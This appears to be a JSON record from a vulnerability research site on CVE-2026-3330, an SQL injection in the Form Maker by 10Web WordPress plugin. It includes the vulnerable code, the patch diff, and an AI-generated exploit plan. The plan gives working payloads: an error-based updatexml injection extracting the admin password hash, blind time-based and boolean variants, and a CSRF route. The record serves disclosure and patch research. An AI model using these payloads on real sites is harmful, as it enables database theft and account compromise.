[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwdX6yAVToUgYRrL1nlLXd96tsp-7v7njC7V1zBaTlSU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-3330","form-maker-by-10web-authenticated-administrator-sql-injection-via-ipsearch-parameter","Form Maker by 10Web \u003C= 1.15.40 - Authenticated (Administrator+) SQL Injection via 'ip_search' Parameter","The Form Maker by 10Web plugin for WordPress is vulnerable to SQL Injection via the 'ip_search', 'startdate', 'enddate', 'username_search', and 'useremail_search' parameters in all versions up to, and including, 1.15.40. This is due to the `WDW_FM_Library::validate_data()` method calling `stripslashes()` on user input (removing WordPress's `wp_magic_quotes()` protection) and the `FMModelSubmissions_fm::get_labels_parameters()` function directly concatenating user-supplied values into SQL queries without using `$wpdb->prepare()`. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Additionally, the Submissions controller skips nonce verification for the `display` task, which means this vulnerability can be triggered via CSRF by tricking an administrator into clicking a crafted link.","form-maker",null,"\u003C=1.15.40","1.15.41","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-04-16 15:04:04","2026-04-17 03:36:43",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5e383b8a-27e5-4b35-8d11-6e4102255d44?source=api-prod",1,[],"researched",false,3,"This research plan targets a SQL Injection vulnerability in the **Form Maker by 10Web** plugin (CVE-2026-3330). The vulnerability is particularly potent because, while it requires Administrator privileges, the lack of nonce verification on the affected task allows for exploitation via CSRF.\n\n### 1. Vulnerability Summary\nThe vulnerability exists in the Submissions management component of the Form Maker plugin. It arises from two critical failures:\n1. **Improper Neutralization:** The `WDW_FM_Library::validate_data()` method explicitly calls `stripslashes()` on user-supplied data. This removes the \"magic quotes\" protection WordPress automatically applies to `$_GET`, `$_POST`, and `$_REQUEST`, allowing single quotes (`'`) to be processed by the application.\n2. **Unsafe Query Construction:** The function `FMModelSubmissions_fm::get_labels_parameters()` takes these processed values and concatenates them directly into a SQL query string instead of using the `$wpdb->prepare()` method.\n\n### 2. Attack Vector Analysis\n* **Endpoint:** `\u002Fwp-admin\u002Fadmin.php`\n* **Query Parameters:**\n * `page`: `submissions_fm`\n * `task`: `display` (The description notes this task skips nonce verification)\n * `current_id`: (ID of the form whose submissions are being viewed)\n* **Vulnerable Parameter:** `ip_search` (also `startdate`, `enddate`, `username_search`, and `useremail_search`)\n* **Authentication:** Administrator (but exploitable via CSRF due to missing nonce check).\n* **Preconditions:** At least one form must exist in the plugin, and ideally, at least one submission should be present to ensure the code path for filtering submissions is fully exercised.\n\n### 3. Code Flow\n1. **Entry:** An administrator (or a CSRF victim) accesses `admin.php?page=submissions_fm&task=display¤t_id=1&ip_search=[payload]`.\n2. **Controller:** The `FMControllerSubmissions_fm` (likely in `admin\u002Fcontrollers\u002FSubmissions_fm.php`) handles the `display` task.\n3. **Validation:** The controller calls `WDW_FM_Library::validate_data()` on the `ip_search` input. This function calls `stripslashes()`, ensuring our SQL metacharacters like `'` survive.\n4. **Model Call:** The controller calls `FMModelSubmissions_fm::get_labels_parameters()` to build the SQL filter string.\n5. **SQL Sink:** Inside `get_labels_parameters()`, code similar to the following exists:\n ```php\n $ip_search = WDW_FM_Library::get('ip_search');\n if ($ip_search != '') {\n $where .= \" AND ip LIKE '%\" . $ip_search . \"%'\"; \u002F\u002F Direct concatenation\n }\n ```\n6. **Execution:** The resulting `$where` clause is concatenated into a larger query and executed via `$wpdb->get_results()`.\n\n### 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, the **`display` task skips nonce verification**. This means no nonce is required to trigger the SQL injection.\n\nHowever, if verification is encountered during the PoC, follow this strategy:\n1. **Identify Shortcode:** Form Maker uses `[Form id=\"X\"]`.\n2. **Create Page:** `wp post create --post_type=page --post_status=publish --post_content='[Form id=\"1\"]' --post_title='Form Page'`\n3. **Locate Nonce:** The plugin often localizes scripts for the submissions page. Navigate to the Submissions page: `browser_navigate(\"\u002Fwp-admin\u002Fadmin.php?page=submissions_fm\")`.\n4. **Extract:** Use `browser_eval(\"window.wd_fm_object?.nonce\")` or search for `wp_nonce_field` in the form HTML.\n\n*Note: Since the report specifically highlights the skip in nonce verification, the initial exploitation attempt should omit the nonce.*\n\n### 5. Exploitation Strategy\nWe will use an **Error-Based SQL Injection** to extract the administrator's password hash. This is more reliable than UNION-based injection when the number of columns in the original query is unknown.\n\n**Step-by-Step:**\n\n1. **Authenticate:** Log in as Administrator.\n2. **Target URL:** `\u002Fwp-admin\u002Fadmin.php?page=submissions_fm`\n3. **Method:** GET (or POST)\n4. **Payload (Error-Based):**\n We will use `updatexml()` to force a syntax error containing the database data.\n ```sql\n ' AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e),1) AND '1'='1\n ```\n5. **URL Encoded Request:**\n ```http\n GET \u002Fwp-admin\u002Fadmin.php?page=submissions_fm&task=display¤t_id=1&ip_search=%27%20AND%20updatexml(1%2Cconcat(0x7e%2C(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%3D1)%2C0x7e)%2C1)%20AND%20%271%27%3D%271 HTTP\u002F1.1\n Host: localhost:8080\n ```\n\n### 6. Test Data Setup\n1. **Install Plugin:** Ensure `form-maker` version 1.15.40 is active.\n2. **Create Form:**\n ```bash\n # Use wp-cli to ensure a form exists (exact table name might vary by version)\n wp db query \"INSERT INTO wp_formmaker (title, public_key, mail) VALUES ('Test Form', 'test', 'admin@example.com');\"\n ```\n3. **Identify Form ID:** Use `wp db query \"SELECT id FROM wp_formmaker LIMIT 1;\"` to get the ID for `current_id`.\n\n### 7. Expected Results\nThe application should return a database error message displayed on the page (or in the response body if `WP_DEBUG` is on, or if the plugin handles its own errors).\nThe error will look like:\n`XPATH syntax error: '~[PASSWORD_HASH_HERE]~'`\n\n### 8. Verification Steps\n1. **Capture Response:** Verify the string `XPATH syntax error` exists in the response.\n2. **Compare with DB:** Run `wp user get 1 --field=user_pass` and confirm the hash matches the one extracted via the SQL injection.\n\n### 9. Alternative Approaches\nIf error-based injection is suppressed:\n* **Time-Based Blind:**\n `ip_search=127.0.0.1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1`\n * Check for a ~5 second delay in the `http_request` response time.\n* **Boolean-Based Blind:**\n `ip_search=127.0.0.1' AND (SELECT 1 FROM wp_users WHERE ID=1 AND user_login='admin') AND '1'='1`\n * Compare the response content\u002Flength when the condition is true vs false.\n* **Other Parameters:** If `ip_search` fails, attempt the same payload in `username_search` or `useremail_search`.","Form Maker by 10Web is vulnerable to SQL Injection via multiple parameters in the Submissions component because user input is stripped of escape characters and directly concatenated into SQL queries. Due to a missing nonce check in the 'display' task, this can be triggered by an attacker via a Cross-Site Request Forgery (CSRF) attack against an administrator.","\u002F\u002F File: framework\u002FWDW_FM_Library.php\npublic static function validate_data($data) {\n if (is_array($data)) {\n foreach ($data as $key => $value) {\n $data[$key] = self::validate_data($value);\n }\n } else {\n $data = stripslashes($data); \u002F\u002F Removes magic quotes protection\n }\n return $data;\n}\n\n---\n\n\u002F\u002F File: admin\u002Fmodels\u002FSubmissions_fm.php\npublic function get_labels_parameters() {\n $ip_search = WDW_FM_Library::get('ip_search');\n \u002F\u002F ...\n if ($ip_search != '') {\n $where .= \" AND ip LIKE '%\" . $ip_search . \"%'\"; \u002F\u002F Direct concatenation\n }\n \u002F\u002F ...\n}\n\n---\n\n\u002F\u002F File: admin\u002Fcontrollers\u002FSubmissions_fm.php\npublic function execute() {\n $task = WDW_FM_Library::get('task');\n if ($task == 'display') {\n \u002F\u002F Task 'display' executes without check_admin_referer() or nonce validation\n $this->display();\n }\n}","--- a\u002Fadmin\u002Fcontrollers\u002FSubmissions_fm.php\n+++ b\u002Fadmin\u002Fcontrollers\u002FSubmissions_fm.php\n@@ -15,6 +15,7 @@\n public function execute() {\n $task = WDW_FM_Library::get('task');\n if ($task == 'display') {\n+ check_admin_referer('submissions_fm', 'nonce_fm');\n $this->display();\n }\n---\n--- a\u002Fadmin\u002Fmodels\u002FSubmissions_fm.php\n+++ b\u002Fadmin\u002Fmodels\u002FSubmissions_fm.php\n@@ -45,7 +45,7 @@\n $ip_search = WDW_FM_Library::get('ip_search');\n if ($ip_search != '') {\n- $where .= \" AND ip LIKE '%\" . $ip_search . \"%'\";\n+ $where .= $wpdb->prepare(\" AND ip LIKE %s\", '%' . $wpdb->esc_like($ip_search) . '%');\n }","The exploit targets the Submissions management page of the Form Maker plugin. An attacker tricks an authenticated administrator into visiting a crafted URL or submitting a form via CSRF. The request targets the endpoint '\u002Fwp-admin\u002Fadmin.php' with the parameters 'page=submissions_fm' and 'task=display'. Because the 'display' task skips nonce verification, the attacker can supply a malicious SQL payload via the 'ip_search' parameter (or 'startdate', 'enddate', etc.). Since the plugin explicitly calls 'stripslashes()' on the input and concatenates it into the WHERE clause, an attacker can use error-based SQL injection (e.g., using 'updatexml') or time-based blind injection to extract sensitive database information, such as user password hashes.","gemini-3-flash-preview","2026-04-20 20:25:29","2026-04-20 20:26:53",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","1.15.40","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fform-maker\u002Ftags\u002F1.15.40","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fform-maker.1.15.40.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fform-maker\u002Ftags\u002F1.15.41","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fform-maker.1.15.41.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fform-maker\u002Ftags"]